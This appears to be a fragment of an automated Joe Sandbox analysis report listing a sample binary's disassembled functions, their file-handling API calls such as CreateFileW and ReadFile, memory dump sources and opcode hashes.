                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ??3@
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                                                                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1828521557-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                                                                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2136311172-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                                                                                                              Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D